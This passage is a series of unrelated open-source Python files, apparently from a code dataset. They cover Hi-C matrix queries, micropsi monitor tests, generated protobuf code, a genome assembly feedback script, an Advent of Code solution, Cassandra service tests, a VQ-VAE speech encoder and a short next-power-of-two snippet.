i, j, v = query_rect(reader.query, i0, i1, j0, j1, duplex=True)
else:
i, j, v = reader.query(i0, i1, j0, j1)
arr = coo_matrix((v, (i - i0, j - j0)), (i1 - i0, j1 - j0)).toarray()
if balance:
weights = h5["bins"][name]
bias1 = weights[i0:i1]
bias2 = bias1 if (i0, i1) == (j0, j1) else weights[j0:j1]
if divisive_weights:
bias1 = 1 / bias1
bias2 = 1 / bias2
arr = arr * np.outer(bias1, bias2)
return arr
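# Minimal usage sketch (illustrative only, not part of the module): open an
# existing cooler file and run a few range queries. "test.cool" is an assumed
# placeholder; adjust the path and region names to your data.
if __name__ == "__main__":
    clr = Cooler("test.cool")
    print(clr.info)
    print(clr.chromnames[:3])
    bins_df = clr.bins()[:10]            # first ten genomic bins
    pix_df = clr.pixels(join=True)[:10]  # first ten pixels, bin-annotated
    mat = clr.matrix(balance=False).fetch(clr.chromnames[0])
    print(bins_df.shape, pix_df.shape, mat.shape)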
|
micropsi_core/tests/test_runtime_monitors.py | joschabach/micropsi2 | 119 | 11086884 | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
"""
Basic tests for monitor api
"""
import pytest
from micropsi_core import runtime as micropsi
def test_add_gate_monitor(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen', sheaf='default')
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'gate gen @ Node A1'
assert monitor.node_uid == 'n0001'
assert monitor.target == 'gen'
assert monitor.type == 'gate'
assert monitor.sheaf == 'default'
assert monitor.color.startswith('#')
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert len(monitor.values) == 1
@pytest.mark.engine("dict_engine")
def test_add_slot_monitor(fixed_nodenet):
uid = micropsi.add_slot_monitor(fixed_nodenet, 'n0001', 'gen', name="FooBarMonitor", color="#112233")
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'FooBarMonitor'
assert monitor.node_uid == 'n0001'
assert monitor.target == 'gen'
assert monitor.type == 'slot'
assert monitor.color == '#112233'
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert len(monitor.values) == 1
def test_add_link_monitor(fixed_nodenet):
uid = micropsi.add_link_monitor(fixed_nodenet, 'n0005', 'gen', 'n0003', 'gen', 'weight', 'Testmonitor', color="#112233")
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'Testmonitor'
assert monitor.property == 'weight'
assert monitor.source_node_uid == 'n0005'
assert monitor.target_node_uid == 'n0003'
assert monitor.gate_type == 'gen'
assert monitor.slot_type == 'gen'
assert monitor.color == "#112233"
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert round(monitor.values[1], 2) == 1
micropsi.nodenets[fixed_nodenet].set_link_weight('n0005', 'gen', 'n0003', 'gen', weight=0.7)
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert len(monitor.values) == 2
assert round(monitor.values[2], 2) == 0.7
def test_add_modulator_monitor(fixed_nodenet):
uid = micropsi.add_modulator_monitor(fixed_nodenet, 'base_test', 'Testmonitor', color="#112233")
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'Testmonitor'
assert monitor.modulator == 'base_test'
assert monitor.color == "#112233"
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.values[1] == 1
micropsi.nodenets[fixed_nodenet].set_modulator('base_test', 0.7)
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert len(monitor.values) == 2
assert monitor.values[2] == 0.7
def test_add_custom_monitor(fixed_nodenet):
code = """return len(netapi.get_nodes())"""
uid = micropsi.add_custom_monitor(fixed_nodenet, code, 'Nodecount', color="#112233")
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor.name == 'Nodecount'
assert monitor.compiled_function is not None
assert monitor.function == code
assert monitor.color == "#112233"
assert len(monitor.values) == 0
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert len(monitor.values) == 1
assert monitor.values[1] == len(micropsi.nodenets[fixed_nodenet].netapi.get_nodes())
def test_remove_monitor(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen')
assert micropsi.nodenets[fixed_nodenet].get_monitor(uid) is not None
micropsi.remove_monitor(fixed_nodenet, uid)
monitor = micropsi.nodenets[fixed_nodenet].get_monitor(uid)
assert monitor is None
def test_remove_monitored_node(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen', sheaf='default')
micropsi.delete_nodes(fixed_nodenet, ['n0001'])
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.export_monitor_data(fixed_nodenet)
assert monitor[uid]['values'][1] is None
def test_remove_monitored_link(fixed_nodenet):
uid = micropsi.add_link_monitor(fixed_nodenet, 'n0005', 'gen', 'n0003', 'gen', 'weight', 'Testmonitor')
micropsi.delete_link(fixed_nodenet, 'n0005', 'gen', 'n0003', 'gen')
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.export_monitor_data(fixed_nodenet)
assert monitor[uid]['values'][1] is None
def test_remove_monitored_link_via_delete_node(fixed_nodenet):
uid = micropsi.add_link_monitor(fixed_nodenet, 'n0005', 'gen', 'n0003', 'gen', 'weight', 'Testmonitor')
micropsi.delete_nodes(fixed_nodenet, ['n0005'])
micropsi.step_nodenet(fixed_nodenet)
monitor = micropsi.export_monitor_data(fixed_nodenet)
assert monitor[uid]['values'][1] is None
def test_get_monitor_data(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen', name="Testmonitor")
micropsi.step_nodenet(fixed_nodenet)
data = micropsi.get_monitor_data(fixed_nodenet)
assert data['current_step'] == 1
assert data['monitors'][uid]['name'] == 'Testmonitor'
values = data['monitors'][uid]['values']
assert len(values.keys()) == 1
assert [k for k in values.keys()] == [1]
def test_export_monitor_data(fixed_nodenet):
uid1 = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen')
uid2 = micropsi.add_gate_monitor(fixed_nodenet, 'n0003', 'gen')
micropsi.step_nodenet(fixed_nodenet)
data = micropsi.export_monitor_data(fixed_nodenet)
assert uid1 in data
assert 'values' in data[uid1]
assert uid2 in data
def test_export_monitor_data_with_id(fixed_nodenet):
uid1 = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen', name="Testmonitor")
micropsi.add_gate_monitor(fixed_nodenet, 'n0003', 'gen')
micropsi.step_nodenet(fixed_nodenet)
data = micropsi.export_monitor_data(fixed_nodenet, monitor_uid=uid1)
assert data['name'] == 'Testmonitor'
assert 'values' in data
def test_clear_monitor(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen')
micropsi.step_nodenet(fixed_nodenet)
micropsi.clear_monitor(fixed_nodenet, uid)
data = micropsi.get_monitor_data(fixed_nodenet)
values = data['monitors'][uid]['values']
assert len(values.keys()) == 0
def test_fetch_partial_monitor_data(fixed_nodenet):
uid = micropsi.add_gate_monitor(fixed_nodenet, 'n0001', 'gen')
i = 0
while i < 50:
micropsi.step_nodenet(fixed_nodenet)
i += 1
assert micropsi.nodenets[fixed_nodenet].current_step == 50
# get 10 items from [20 - 29]
data = micropsi.export_monitor_data(fixed_nodenet, monitor_from=20, monitor_count=10)
values = data[uid]['values']
assert len(values.keys()) == 10
assert set(list(values.keys())) == set(range(20, 30))
# get 10 items from [20 - 29] for one monitor
data = micropsi.export_monitor_data(fixed_nodenet, monitor_uid=uid, monitor_from=20, monitor_count=10)
values = data['values']
assert len(values.keys()) == 10
assert set(list(values.keys())) == set(range(20, 30))
# get 10 newest values [41-50]
data = micropsi.export_monitor_data(fixed_nodenet, monitor_count=10)
values = data[uid]['values']
assert len(values.keys()) == 10
assert set(list(values.keys())) == set(range(41, 51))
# get 10 items, starting at 45 -- assert they are filled up to the left.
data = micropsi.export_monitor_data(fixed_nodenet, monitor_from=40, monitor_count=15)
values = data[uid]['values']
assert len(values.keys()) == 15
assert set(list(values.keys())) == set(range(36, 51))
# get all items, starting at 10
data = micropsi.export_monitor_data(fixed_nodenet, monitor_from=10)
values = data[uid]['values']
assert len(values.keys()) == 41
assert set(list(values.keys())) == set(range(10, 51))
|
pgoapi/protos/POGOProtos/Data/Gym_pb2.py | neoz/pgoapi | 1,457 | 11086895 | <gh_stars>1000+
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos.Data.Gym.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from POGOProtos import Data_pb2 as POGOProtos_dot_Data__pb2
POGOProtos_dot_Enums__pb2 = POGOProtos_dot_Data__pb2.POGOProtos_dot_Enums__pb2
POGOProtos_dot_Data_dot_Player__pb2 = POGOProtos_dot_Data__pb2.POGOProtos_dot_Data_dot_Player__pb2
POGOProtos_dot_Enums__pb2 = POGOProtos_dot_Data__pb2.POGOProtos_dot_Enums__pb2
POGOProtos_dot_Inventory_dot_Item__pb2 = POGOProtos_dot_Data__pb2.POGOProtos_dot_Inventory_dot_Item__pb2
from POGOProtos.Data import Player_pb2 as POGOProtos_dot_Data_dot_Player__pb2
POGOProtos_dot_Enums__pb2 = POGOProtos_dot_Data_dot_Player__pb2.POGOProtos_dot_Enums__pb2
from POGOProtos.Map import Fort_pb2 as POGOProtos_dot_Map_dot_Fort__pb2
POGOProtos_dot_Enums__pb2 = POGOProtos_dot_Map_dot_Fort__pb2.POGOProtos_dot_Enums__pb2
POGOProtos_dot_Inventory_dot_Item__pb2 = POGOProtos_dot_Map_dot_Fort__pb2.POGOProtos_dot_Inventory_dot_Item__pb2
from POGOProtos.Data_pb2 import *
from POGOProtos.Data.Player_pb2 import *
from POGOProtos.Map.Fort_pb2 import *
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos.Data.Gym.proto',
package='POGOProtos.Data.Gym',
syntax='proto3',
serialized_pb=_b('\n\x19POGOProtos.Data.Gym.proto\x12\x13POGOProtos.Data.Gym\x1a\x15POGOProtos.Data.proto\x1a\x1cPOGOProtos.Data.Player.proto\x1a\x19POGOProtos.Map.Fort.proto\"\x90\x01\n\rGymMembership\x12\x32\n\x0cpokemon_data\x18\x01 \x01(\x0b\x32\x1c.POGOProtos.Data.PokemonData\x12K\n\x16trainer_public_profile\x18\x02 \x01(\x0b\x32+.POGOProtos.Data.Player.PlayerPublicProfile\"u\n\x08GymState\x12\x30\n\tfort_data\x18\x01 \x01(\x0b\x32\x1d.POGOProtos.Map.Fort.FortData\x12\x37\n\x0bmemberships\x18\x02 \x03(\x0b\x32\".POGOProtos.Data.Gym.GymMembershipP\x00P\x01P\x02\x62\x06proto3')
,
dependencies=[POGOProtos_dot_Data__pb2.DESCRIPTOR,POGOProtos_dot_Data_dot_Player__pb2.DESCRIPTOR,POGOProtos_dot_Map_dot_Fort__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_GYMMEMBERSHIP = _descriptor.Descriptor(
name='GymMembership',
full_name='POGOProtos.Data.Gym.GymMembership',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='pokemon_data', full_name='POGOProtos.Data.Gym.GymMembership.pokemon_data', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='trainer_public_profile', full_name='POGOProtos.Data.Gym.GymMembership.trainer_public_profile', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=131,
serialized_end=275,
)
_GYMSTATE = _descriptor.Descriptor(
name='GymState',
full_name='POGOProtos.Data.Gym.GymState',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='fort_data', full_name='POGOProtos.Data.Gym.GymState.fort_data', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='memberships', full_name='POGOProtos.Data.Gym.GymState.memberships', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=277,
serialized_end=394,
)
_GYMMEMBERSHIP.fields_by_name['pokemon_data'].message_type = POGOProtos_dot_Data__pb2._POKEMONDATA
_GYMMEMBERSHIP.fields_by_name['trainer_public_profile'].message_type = POGOProtos_dot_Data_dot_Player__pb2._PLAYERPUBLICPROFILE
_GYMSTATE.fields_by_name['fort_data'].message_type = POGOProtos_dot_Map_dot_Fort__pb2._FORTDATA
_GYMSTATE.fields_by_name['memberships'].message_type = _GYMMEMBERSHIP
DESCRIPTOR.message_types_by_name['GymMembership'] = _GYMMEMBERSHIP
DESCRIPTOR.message_types_by_name['GymState'] = _GYMSTATE
GymMembership = _reflection.GeneratedProtocolMessageType('GymMembership', (_message.Message,), dict(
DESCRIPTOR = _GYMMEMBERSHIP,
__module__ = 'POGOProtos.Data.Gym_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Data.Gym.GymMembership)
))
_sym_db.RegisterMessage(GymMembership)
GymState = _reflection.GeneratedProtocolMessageType('GymState', (_message.Message,), dict(
DESCRIPTOR = _GYMSTATE,
__module__ = 'POGOProtos.Data.Gym_pb2'
# @@protoc_insertion_point(class_scope:POGOProtos.Data.Gym.GymState)
))
_sym_db.RegisterMessage(GymState)
# @@protoc_insertion_point(module_scope)
|
scripts/GenerateFeedback.py | AustinHartman/shasta | 267 | 11086909 | #!/usr/bin/python3
import configparser
import sys
import getopt
import json
import csv
helpMessage = """
Usage:
GenerateFeedback.py --assemblyDirectory /path/to/assemblyDirectory
Note: The goal of this script is to provide feedback on a de novo assembly done using the
Shasta long read assembler.
Each genome is different and reads differ in quality. So it is likely that you will need
to repeat the `assembly -> feedback -> assembly` process a few times.
If you're not happy with the assembly after a few (3-4) tries, please file a Github issue
and we can help.
"""
def usage():
print(helpMessage)
return
def loadAssemblySummary(assemblyDirPath):
assemblySummary = {}
assemblySummaryFile = '{}/AssemblySummary.json'.format(assemblyDirPath)
with open(assemblySummaryFile) as jsonFile:
assemblySummary = json.load(jsonFile)
return assemblySummary
def analyze(assemblyDirPath, genomeSize):
assemblySummary = loadAssemblySummary(assemblyDirPath)
readsUsedInAssembly = assemblySummary['Reads used in this assembly']
numberOfReads = readsUsedInAssembly['Number of reads']
readGraph = assemblySummary['Read graph']
isolatedReadsFraction = float(readGraph['Isolated reads fraction']['Reads'])
alignments = assemblySummary['Alignments']
numberOfAlignmentCandidates = alignments['Number of alignment candidates found by the LowHash algorithm']
numberOfGoodAlignments = alignments['Number of good alignments']
assembledSegments = assemblySummary['Assembled segments']
totalAssembledLength = assembledSegments['Total assembled segment length']
longestSegmentLength = assembledSegments['Longest assembled segment length']
segmentsN50 = assembledSegments['Assembled segments N50']
print()
print('Number of reads used = {}'.format(numberOfReads))
print('Isolated reads fraction = {:.2f}'.format(isolatedReadsFraction))
print('Number of alignment candidates = {}'.format(numberOfAlignmentCandidates))
print('Number of good alignments = {}'.format(numberOfGoodAlignments))
print()
print('Genome fraction assembled = {:.2f} %'.format(totalAssembledLength * 100 / genomeSize))
print('Longest assembled segment length = {}'.format(longestSegmentLength))
print('Assembled segments N50 = {}'.format(segmentsN50))
print()
avgCandidatesPerRead = numberOfAlignmentCandidates / numberOfReads
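    # The thresholds used below (20 candidates per read, 5 good alignments per
    # read, 0.5 isolated-read fraction) are the rough rules of thumb that drive
    # the printed suggestions; they are heuristics, not hard limits.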
config = getConfig(assemblyDirPath)
minHashConfig = config['MinHash']
print('Feedback, if any:')
if (avgCandidatesPerRead < 20):
print('MinHash phase did not generate enough alignment candidates.')
print('Try the following in order:')
print(' (Suggestion) Increase `MinHash.minHashIterationCount` by 10, up to a maximum of 100.')
if (int(minHashConfig['m']) == 4):
print(' (Suggestion) Decrease `MinHash.m` to 3.')
else:
# Enough promising candidate pairs were generated
avgGoodAlignmentsPerRead = numberOfGoodAlignments / numberOfReads
if (avgGoodAlignmentsPerRead < 5 or isolatedReadsFraction > 0.5):
# ... but not enough candidates met the bar of what is considered a good alignment.
msg = (
'Not enough good alignments were generated per read. '
'Try relaxing the definition of what makes a good alignment.'
)
print(msg)
print('Try the following in order:')
            print(' (Suggestion) Decrease `Align.minAlignedFraction` by 0.05, down to a minimum of 0.2.')
            print(' (Suggestion) Decrease `Align.minAlignedMarkerCount` by 20, down to a minimum of 200.')
print(' (Suggestion) Increase `Align.maxSkip` & `Align.maxDrift` by 10, to allow for larger gaps in alignments.')
def getConfig(assemblyDirPath):
config = configparser.ConfigParser()
configFilePath = '{}/shasta.conf'.format(assemblyDirPath)
if not config.read(configFilePath):
raise Exception('Error reading config file {}.'.format(configFilePath))
return config
def main(argv):
assemblyDirPath = ""
try:
opts, args = getopt.getopt(argv,"", ["assemblyDirectory="])
except getopt.GetoptError:
usage()
sys.exit(2)
for opt, arg in opts:
if opt in ("--assemblyDirectory"):
assemblyDirPath = arg
if assemblyDirPath == "":
usage()
exit(2)
print()
genomeSizeMessage = """
What is the approximate genome size in megabases (Mbp)?
Examples:
3000 (for a 3 Gbp genome)
0.4 (for a 400 Kbp genome)
"""
print(genomeSizeMessage)
    genomeSize = float(input('Approximate genome size in megabases (Mbp): '))
genomeSize = int(genomeSize * 1000 * 1000)
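    # Convert Mbp to bp, e.g. an input of 3000 (Mbp) becomes 3,000,000,000 bases.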
analyze(assemblyDirPath, genomeSize)
print()
return
if __name__ == '__main__':
main(sys.argv[1:])
|
2021/day_19.py | salt-die/Advent-of-Code | 105 | 11086923 | from itertools import product
import cv2
import numpy as np
import aoc_helper
from aoc_helper.utils import extract_ints
class Scanner:
def __init__(self, coords):
self.coords = coords
self.distances = np.array(
list(map(set, np.linalg.norm(coords[:, None] - coords[None], axis=-1)))
)
def parse_raw():
raw = aoc_helper.day(19).split("\n\n")
scanners = [ ]
for scanner in raw:
_, data = scanner.split("\n", 1)
scanners.append(
Scanner(
np.fromiter(extract_ints(data), dtype=int).reshape(-1, 3)
)
)
return scanners
SCANNERS = parse_raw()
def coalesce(a, b):
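    # Two scanners cover the same region when they share at least 12 beacons.
    # Pairwise distances are invariant under rotation and translation, so a
    # beacon j in `a` is matched to a beacon k in `b` when their distance sets
    # overlap in at least 12 values; four such correspondences are enough for
    # cv2.estimateAffine3D to recover the rigid transform mapping b onto a.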
js, ks = [ ], [ ]
for (j, p), (k, q) in product(
enumerate(a.distances),
enumerate(b.distances),
):
if len(p & q) >= 12:
js.append(j)
ks.append(k)
if len(js) == 4:
break
else:
return False
M = cv2.estimateAffine3D(b.coords[ks], a.coords[js])[1].round().astype(int)
orientation, translation = M[:, :3], M[:, 3]
transformed = b.coords @ orientation.T + translation
check = (a.coords[:, None] == transformed[None]).all(-1)
where_a_equal_b, where_b_equal_a = np.where(check)
b_not_equal_a_mask = ~check.any(0)
a.distances[where_a_equal_b] |= b.distances[where_b_equal_a]
a.distances = np.concatenate((a.distances, b.distances[b_not_equal_a_mask]))
a.coords = np.concatenate((a.coords, transformed[b_not_equal_a_mask]))
a.scanners.append(translation)
return True
def coalesce_all():
origin = SCANNERS[0]
origin.scanners = [np.zeros(3, dtype=int)]
unpaired = SCANNERS[1:]
while unpaired:
unpaired = [
scanner
for scanner in unpaired
if not coalesce(origin, scanner)
]
return origin
ORIGIN = coalesce_all()
def part_one():
return len(ORIGIN.coords)
def part_two():
scanners = np.array(ORIGIN.scanners)
return np.abs(scanners[:, None] - scanners[None]).sum(axis=-1).max()
aoc_helper.submit(19, part_one)
aoc_helper.submit(19, part_two)
|
frameworks/cassandra/tests/test_sanity.py | iss-lab/dcos-commons | 201 | 11086937 | import pytest
import logging
from typing import Any, Dict, Iterator, List
import sdk_cmd
import sdk_hosts
import sdk_install
import sdk_jobs
import sdk_metrics
import sdk_networks
import sdk_plan
import sdk_service
import sdk_tasks
import sdk_upgrade
from tests import config
log = logging.getLogger(__name__)
@pytest.fixture(scope="module", autouse=True)
def configure_package(configure_security: None) -> Iterator[None]:
test_jobs: List[Dict[str, Any]] = []
try:
test_jobs = config.get_all_jobs(node_address=config.get_foldered_node_address())
# destroy/reinstall any prior leftover jobs, so that they don't touch the newly installed service:
for job in test_jobs:
sdk_jobs.install_job(job)
sdk_install.uninstall(config.PACKAGE_NAME, config.get_foldered_service_name())
sdk_upgrade.test_upgrade(
config.PACKAGE_NAME,
config.get_foldered_service_name(),
config.DEFAULT_TASK_COUNT,
from_options={"service": {"name": config.get_foldered_service_name()}},
)
yield # let the test session execute
finally:
sdk_install.uninstall(config.PACKAGE_NAME, config.get_foldered_service_name())
for job in test_jobs:
sdk_jobs.remove_job(job)
@pytest.mark.sanity
def test_endpoints() -> None:
# check that we can reach the scheduler via admin router, and that returned endpoints are sanitized:
endpoints = sdk_networks.get_endpoint(
config.PACKAGE_NAME, config.get_foldered_service_name(), "native-client"
)
assert endpoints["dns"][0] == sdk_hosts.autoip_host(
config.get_foldered_service_name(), "node-0-server", 9042
)
assert "vip" not in endpoints
@pytest.mark.sanity
@pytest.mark.smoke
def test_repair_cleanup_plans_complete() -> None:
parameters = {"CASSANDRA_KEYSPACE": "testspace1"}
# populate 'testspace1' for test, then delete afterwards:
with sdk_jobs.RunJobContext(
before_jobs=[
config.get_write_data_job(node_address=config.get_foldered_node_address()),
config.get_verify_data_job(node_address=config.get_foldered_node_address()),
],
after_jobs=[
config.get_delete_data_job(node_address=config.get_foldered_node_address()),
config.get_verify_deletion_job(node_address=config.get_foldered_node_address()),
],
):
sdk_plan.start_plan(config.get_foldered_service_name(), "cleanup", parameters=parameters)
sdk_plan.wait_for_completed_plan(config.get_foldered_service_name(), "cleanup")
sdk_plan.start_plan(config.get_foldered_service_name(), "repair", parameters=parameters)
sdk_plan.wait_for_completed_plan(config.get_foldered_service_name(), "repair")
@pytest.mark.sanity
@pytest.mark.dcos_min_version("1.9")
def test_metrics() -> None:
expected_metrics = [
"org.apache.cassandra.metrics.Table.CoordinatorReadLatency.system.hints.p999",
"org.apache.cassandra.metrics.Table.CompressionRatio.system_schema.indexes",
"org.apache.cassandra.metrics.ThreadPools.ActiveTasks.internal.MemtableReclaimMemory",
]
def expected_metrics_exist(emitted_metrics: List[str]) -> bool:
return sdk_metrics.check_metrics_presence(
emitted_metrics=emitted_metrics, expected_metrics=expected_metrics
)
sdk_metrics.wait_for_service_metrics(
config.PACKAGE_NAME,
config.get_foldered_service_name(),
"node-0",
"node-0-server",
config.DEFAULT_CASSANDRA_TIMEOUT,
expected_metrics_exist,
)
@pytest.mark.sanity
def test_custom_jmx_port() -> None:
expected_open_port = ":7200"
new_config = {"cassandra": {"jmx_port": 7200}}
sdk_service.update_configuration(
config.PACKAGE_NAME,
config.get_foldered_service_name(),
new_config,
config.DEFAULT_TASK_COUNT,
)
sdk_plan.wait_for_completed_deployment(config.get_foldered_service_name())
tasks = sdk_tasks.get_service_tasks(config.get_foldered_service_name(), "node")
for task in tasks:
_, stdout, _ = sdk_cmd.run_cli("task exec {} netstat -nlp | grep :7200".format(task.id))
assert expected_open_port in stdout
@pytest.mark.sanity
def test_udf() -> None:
test_jobs: List[Dict[str, Any]] = []
try:
test_jobs = config.get_udf_jobs(node_address=config.get_foldered_node_address())
# destroy/reinstall any prior leftover jobs, so that they don't touch the newly installed service:
for job in test_jobs:
sdk_jobs.install_job(job)
new_config = {
"cassandra": {
"enable_user_defined_functions": True,
"enable_scripted_user_defined_functions": True,
}
}
sdk_service.update_configuration(
config.PACKAGE_NAME,
config.get_foldered_service_name(),
new_config,
config.DEFAULT_TASK_COUNT,
)
config.verify_client_can_write_read_udf(config.get_foldered_node_address())
finally:
# remove job definitions from metronome
for job in test_jobs:
sdk_jobs.remove_job(job)
|
src/models/convolutional_encoder.py | roberthoenig/VQ-VAE-Speech | 241 | 11086950 | <gh_stars>100-1000
#####################################################################################
# MIT License #
# #
# Copyright (C) 2019 <NAME> #
# #
# This file is part of VQ-VAE-Speech. #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
#####################################################################################
from modules.residual_stack import ResidualStack
from modules.conv1d_builder import Conv1DBuilder
from error_handling.console_logger import ConsoleLogger
import torch
import torch.nn as nn
import torch.nn.functional as F
class ConvolutionalEncoder(nn.Module):
def __init__(self, in_channels, num_hiddens, num_residual_layers, num_residual_hiddens,
use_kaiming_normal, input_features_type, features_filters, sampling_rate,
device, verbose=False):
super(ConvolutionalEncoder, self).__init__()
"""
2 preprocessing convolution layers with filter length 3
and residual connections.
"""
self._conv_1 = Conv1DBuilder.build(
in_channels=features_filters,
out_channels=num_hiddens,
kernel_size=3,
use_kaiming_normal=use_kaiming_normal,
padding=1
)
self._conv_2 = Conv1DBuilder.build(
in_channels=num_hiddens,
out_channels=num_hiddens,
kernel_size=3,
use_kaiming_normal=use_kaiming_normal,
padding=1
)
"""
1 strided convolution length reduction layer with filter
length 4 and stride 2 (downsampling the signal by a factor
of two).
"""
self._conv_3 = Conv1DBuilder.build(
in_channels=num_hiddens,
out_channels=num_hiddens,
kernel_size=4,
stride=2, # timestep * 2
use_kaiming_normal=use_kaiming_normal,
padding=2
)
"""
2 convolutional layers with length 3 and
residual connections.
"""
self._conv_4 = Conv1DBuilder.build(
in_channels=num_hiddens,
out_channels=num_hiddens,
kernel_size=3,
use_kaiming_normal=use_kaiming_normal,
padding=1
)
self._conv_5 = Conv1DBuilder.build(
in_channels=num_hiddens,
out_channels=num_hiddens,
kernel_size=3,
use_kaiming_normal=use_kaiming_normal,
padding=1
)
"""
        4 feedforward ReLU layers with residual connections.
"""
self._residual_stack = ResidualStack(
in_channels=num_hiddens,
num_hiddens=num_hiddens,
num_residual_layers=num_residual_layers,
num_residual_hiddens=num_residual_hiddens,
use_kaiming_normal=use_kaiming_normal
)
self._input_features_type = input_features_type
self._features_filters = features_filters
self._sampling_rate = sampling_rate
self._device = device
self._verbose = verbose
def forward(self, inputs):
if self._verbose:
ConsoleLogger.status('inputs size: {}'.format(inputs.size()))
x_conv_1 = F.relu(self._conv_1(inputs))
if self._verbose:
ConsoleLogger.status('x_conv_1 output size: {}'.format(x_conv_1.size()))
x = F.relu(self._conv_2(x_conv_1)) + x_conv_1
if self._verbose:
ConsoleLogger.status('_conv_2 output size: {}'.format(x.size()))
x_conv_3 = F.relu(self._conv_3(x))
if self._verbose:
ConsoleLogger.status('_conv_3 output size: {}'.format(x_conv_3.size()))
x_conv_4 = F.relu(self._conv_4(x_conv_3)) + x_conv_3
if self._verbose:
ConsoleLogger.status('_conv_4 output size: {}'.format(x_conv_4.size()))
x_conv_5 = F.relu(self._conv_5(x_conv_4)) + x_conv_4
if self._verbose:
ConsoleLogger.status('x_conv_5 output size: {}'.format(x_conv_5.size()))
x = self._residual_stack(x_conv_5) + x_conv_5
if self._verbose:
ConsoleLogger.status('_residual_stack output size: {}'.format(x.size()))
return x
|
tests/errors/semantic/blocking/CONST_ASSIGNED_ARGUMENT2.py | dina-fouad/pyccel | 206 | 11086955 | # pylint: disable=missing-function-docstring, missing-module-docstring/
#$ header function array_int32_1d_add_const(const int32[:], int32[:])
def array_int32_1d_add_const( x, y ):
x[:] += y
|
Bit Manipulation/next power of 2/python/nextpowOf2.py | iabhimanyu/Algorithms | 715 | 11086960 | def nextPowOf2(n):
p = 1
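    # A power of two has exactly one set bit, so n & (n - 1) == 0 detects it;
    # the leading `n and` guards against n == 0.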
if (n and not(n & (n - 1))):
return n
    while (p < n):
        p <<= 1
    return p
t = int(input())
for i in range(t):
    n = int(input())
